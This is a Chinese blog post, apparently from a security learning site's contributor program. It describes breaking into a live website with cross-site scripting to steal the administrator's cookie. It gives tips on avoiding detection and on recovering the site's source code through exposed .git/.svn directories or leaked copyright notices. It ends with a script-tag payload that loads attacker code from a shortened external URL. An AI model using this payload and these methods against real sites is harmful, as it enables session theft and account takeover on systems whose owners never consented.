![8e91bdfd061ca8ebfd4b889ffed0dc06.png](https://i-blog.csdnimg.cn/blog_migrate/c70e823c5e99f5ca4bc28522921e00ee.jpeg)
作者:青空酱 合天智汇
原创投稿活动:重金悬赏 | 合天原创投稿等你来
![82955a2fec1999bf4c6f7665045e99e0.png](https://i-blog.csdnimg.cn/blog_migrate/7bc330c1ec0201350ca3c3d52412a2de.jpeg)
序言
实战渗透某站点时遇到的,经过几天研究最终成功绕过限制并打到管理员cookie,特此记录下备忘。将一些琐碎的trick和知识点进行了有机结合与综合实践,希望本文能对读者有所帮助,若有谬误,还请指正。
![4ff61aa954676b5393d6775619cac0a1.png](https://i-blog.csdnimg.cn/blog_migrate/6155d2b3ff561e8a7730ab09e097adbd.jpeg)
准备工作
首先看看站点,事先测过了SQL等漏洞,这里只测试XSS。
![7b2e3a416037962f9b169d2967750539.png](https://i-blog.csdnimg.cn/blog_migrate/9a6f81aaea185722afc49c5d9ae2b336.jpeg)
先尝试填充一些正常数据以判断是否会回显payload,经过测试,该站点提交信息会直接跳转回首页,无法查看payload解析执行情况。
注意:测试xss时往往不要一上来就怼<script>/:..等危险字符,有暴露渗透行为的风险且难以控制页面显示情况。
看不到回显难道就要盲打嘛?
这里提供一个思路:尝试获取该系统的源码并本地搭建进行测试。
好的,既然思路明确了,我们就尝试去获取该系统的源码。
- 扫描敏感目录及文件,查看是否存在.git / .svn等代码工程文件,如果存在的话,是 可以直接通过该敏感文件还原出系统源码的。
相关工具:https://github.com/lijiejie/GitHack
Seay-svn 还原工具,大家可以自行下载
- 从源码本身着手,寻找版权相关信息,之后去网上寻找并下载源码。
渗透该站时便使用了方法2,尝试访问后台时网页便爆出了我们想要的信息。
![159985e9fa7de4c79a3279e35f8953f3.png](https://i-blog.csdnimg.cn/blog_migrate/460d2f875cbb3b3d2938bda981b940c7.jpeg)
搜索相关源码并下载,成功在本地搭建。
![280ab505cf3f5b9ef71dbc10cf9e6e86.png](https://i-blog.csdnimg.cn/blog_migrate/003789c395218c6b457712f62e238c62.jpeg)
好了,这样我们就可以放心测试xss了。(本地你想怎么怼都不会有风险的),关于XSS的学习,可以到合天网安实验室学习渗透XSS漏洞原理和利用,点击“实验:渗透XSS漏洞原理和利用(合天网安实验室)”可操作学习。
![9c43931533c35dc061aa77ac4bfcfc60.png](https://i-blog.csdnimg.cn/blog_migrate/bcd917d86c5f17b3b6d8bcb729482971.jpeg)
![e858d786eee901ace9277b1aecdd6f28.png](https://i-blog.csdnimg.cn/blog_migrate/c765bec2c0ae27ef6fac0a30d62bdf5f.jpeg)
好戏开演
准备好payload:
<script src="http://x.co/qwq"></script>
这里推荐一个网站缩短服务:
http://x.co
访问设置url即可